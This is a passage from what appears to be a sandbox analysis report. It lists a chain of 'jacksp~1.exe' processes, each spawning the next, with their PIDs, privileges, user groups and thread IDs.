"NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 190 os_tid = 0x66c Thread: id = 191 os_tid = 0x318 Thread: id = 192 os_tid = 0x208 Process: id = "58" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x3f52f000" os_pid = "0x510" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0x340" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 193 os_tid = 0x24c Thread: id = 194 os_tid = 0x404 Thread: id = 195 os_tid = 0x30c Process: id = "59" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x3e80a000" os_pid = "0x2e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "58" os_parent_pid = "0x510" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 196 os_tid = 0x698 Thread: id = 197 os_tid = 0x5dc Thread: id = 198 os_tid = 0x634 Process: id = "60" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x3d908000" os_pid = "0x618" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0x2e0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 199 os_tid = 0x49c Thread: id = 200 os_tid = 0x64 Thread: id = 201 os_tid = 0x4f8 Process: id = "61" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x39bbf000" os_pid = "0x1e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "60" os_parent_pid = "0x618" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 202 os_tid = 0x648 Thread: id = 203 os_tid = 0xc4 Thread: id = 204 os_tid = 0x7a0 Process: id = "62" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x396e9000" os_pid = "0x71c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0x1e0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 205 os_tid = 0x604 Thread: id = 206 os_tid = 0x540 Thread: id = 207 os_tid = 0x7c0 Process: id = "63" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x387a4000" os_pid = "0x354" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "62" os_parent_pid = "0x71c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 208 os_tid = 0x55c Thread: id = 209 os_tid = 0x66c Thread: id = 210 os_tid = 0x208 Process: id = "64" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x3677e000" os_pid = "0x6bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "63" os_parent_pid = "0x354" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 211 os_tid = 0x61c Thread: id = 212 os_tid = 0x314 Thread: id = 213 os_tid = 0x404 Process: id = "65" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x361d2000" os_pid = "0x430" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "64" os_parent_pid = "0x6bc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 214 os_tid = 0x480 Thread: id = 215 os_tid = 0x538 Thread: id = 216 os_tid = 0x284 Process: id = "66" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x3564d000" os_pid = "0xc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "65" os_parent_pid = "0x430" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 217 os_tid = 0x1e0 Thread: id = 218 os_tid = 0x308 Thread: id = 219 os_tid = 0x758 Process: id = "67" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x33e08000" os_pid = "0x23c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "66" os_parent_pid = "0xc4" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 220 os_tid = 0x6a4 Thread: id = 221 os_tid = 0x2a8 Thread: id = 222 os_tid = 0x5b0 Process: id = "68" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x1e684000" os_pid = "0x42c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "67" os_parent_pid = "0x23c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 223 os_tid = 0x63c Thread: id = 224 os_tid = 0x304 Thread: id = 225 os_tid = 0x558 Process: id = "69" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x1e460000" os_pid = "0x5fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0x42c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 226 os_tid = 0x6ec Thread: id = 227 os_tid = 0x90 Thread: id = 228 os_tid = 0x538 Process: id = "70" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x121b9000" os_pid = "0x604" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "69" os_parent_pid = "0x5fc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 229 os_tid = 0x158 Thread: id = 230 os_tid = 0x740 Thread: id = 231 os_tid = 0x308